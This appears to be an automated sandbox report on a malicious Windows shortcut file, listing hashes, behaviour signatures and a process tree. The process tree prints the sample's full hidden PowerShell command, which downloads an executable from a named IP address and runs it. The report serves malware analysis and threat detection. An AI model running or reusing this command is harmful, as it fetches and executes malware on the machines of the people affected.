Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-01-2025 10:36
Static task
static1
Behavioral task
behavioral1
Sample
WB-ABS-240730-NEW.lnk
Resource
win7-20240903-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
WB-ABS-240730-NEW.lnk
Resource
win10v2004-20241007-en
windows10-2004-x64
25 signatures
150 seconds
General
-
Target
WB-ABS-240730-NEW.lnk
-
Size
2KB
-
MD5
fb1f82957abd04d7fc7821770bcc0ace
-
SHA1
f1791fbc7da30766c1938336275447b791763c83
-
SHA256
7dc2e910ac868412c616ef80d20c76e059c1962b023ca51d8c319185aa0bcbcb
-
SHA512
a1550140664e9a99f4af64a1786c35d36d6ed8f4399391d6616bd7a00f070393982c668a18b2064c88aeee42f9aaf0f56460a79d1c05f00105e22317823a0820
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3052 powershell.exe 3052 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3052 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1524 wrote to memory of 3052 1524 cmd.exe 31 PID 1524 wrote to memory of 3052 1524 cmd.exe 31 PID 1524 wrote to memory of 3052 1524 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\WB-ABS-240730-NEW.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://147.124.216.113/king.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-